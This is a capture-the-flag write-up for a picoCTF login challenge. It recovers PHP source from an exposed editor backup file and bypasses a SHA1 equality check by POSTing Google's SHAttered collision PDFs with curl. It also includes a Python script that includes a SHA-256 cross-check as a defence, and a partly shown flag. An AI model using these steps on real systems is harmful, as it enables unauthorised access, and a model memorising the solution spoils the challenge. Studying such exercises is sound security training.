Description
ABC Bank’s “impossible” login hides a PHP backup that reveals how the server compares username and password. If the SHA1 hashes match while the raw values differ, the code returns the contents of /flag.txt.
Setup
View-source on impossibleLogin.php and append ~ to the filename in the URL (the Emacs-style backup copy) to recover the actual PHP code.
Decode the Base64 strings to learn that matching SHA1 hashes returns the flag from ../flag.txt.
```bash
curl -O https://shattered.io/static/shattered-1.pdf
curl -O https://shattered.io/static/shattered-2.pdf
# "-F name=<file" sends the file's bytes as the field value (not a file upload)
curl -X POST -F "username=<shattered-1.pdf" -F "pwd=<shattered-2.pdf" http://verbal-sleep.picoctf.net:50313/impossibleLogin.php
```
Solution
- Step 1. Recover the backup: browsing impossibleLogin.php~ exposes the real PHP. Base64-decoded strings show the POST parameter names (username/pwd) and reveal the SHA1 equality check.
- Step 2. Exploit the SHA1 collision: use the `shattered-1.pdf`/`shattered-2.pdf` pair from Google’s SHA1 collision research. POST them as username/pwd so the raw bytes differ but SHA1 digests match, triggering `file_get_contents('../flag.txt')`.
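The following script is an added example, not part of the original writeup or the challenge code: it mirrors the decoded PHP decision (same SHA1 digest, different raw bytes) in Python, reports how a colliding pair is laid out (shared prefix, differing block, shared suffix), and shows the defender's cross-check that a SHA1 collision pair still disagrees under SHA-256. The file paths and the sample byte strings are assumptions/constructed inputs.

```python
import hashlib
from pathlib import Path


def sha1_hex(data: bytes) -> str:
    return hashlib.sha1(data).hexdigest()


def classify_pair(a: bytes, b: bytes) -> str:
    """Reproduce the decision the decoded PHP makes on username/pwd.
    Only 'sha1_collision' unlocks the flag: same digest, different bytes."""
    if a == b:
        return "identical"        # raw values equal: check fails
    if sha1_hex(a) != sha1_hex(b):
        return "distinct"         # ordinary login attempt: check fails
    return "sha1_collision"       # digests agree on different input


def collision_layout(a: bytes, b: bytes) -> tuple[int, int, int]:
    """Return (shared prefix length, length of the differing region in a,
    shared suffix length). Identical-prefix collisions such as SHAttered
    differ only inside a short block pair after a common prefix."""
    limit = min(len(a), len(b))
    p = 0
    while p < limit and a[p] == b[p]:
        p += 1
    s = 0
    while s < limit - p and a[-1 - s] == b[-1 - s]:
        s += 1
    return p, len(a) - p - s, s


def second_hash_disagrees(a: bytes, b: bytes) -> bool:
    """Defender's cross-check: a SHA1 collision pair still has different
    SHA-256 digests, so hashing with a second algorithm exposes it."""
    return hashlib.sha256(a).digest() != hashlib.sha256(b).digest()


def analyse_files(path_a: str, path_b: str) -> dict:
    """Run every check on two files on disk (e.g. the two shattered PDFs)."""
    a, b = Path(path_a).read_bytes(), Path(path_b).read_bytes()
    prefix, diff, suffix = collision_layout(a, b)
    return {"verdict": classify_pair(a, b), "sha1": sha1_hex(a),
            "shared_prefix": prefix, "differing_bytes": diff,
            "shared_suffix": suffix, "sha256_differs": second_hash_disagrees(a, b)}


if __name__ == "__main__":
    import sys  # usage: python check_pair.py shattered-1.pdf shattered-2.pdf (assumed names)
    print(analyse_files(sys.argv[1], sys.argv[2]))
```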
Flag
picoCTF{w3Ll_d3sErV3d_Ch4mp_5b26...}
Any SHA1 collision pair works; the shattered.io PDFs are the canonical example.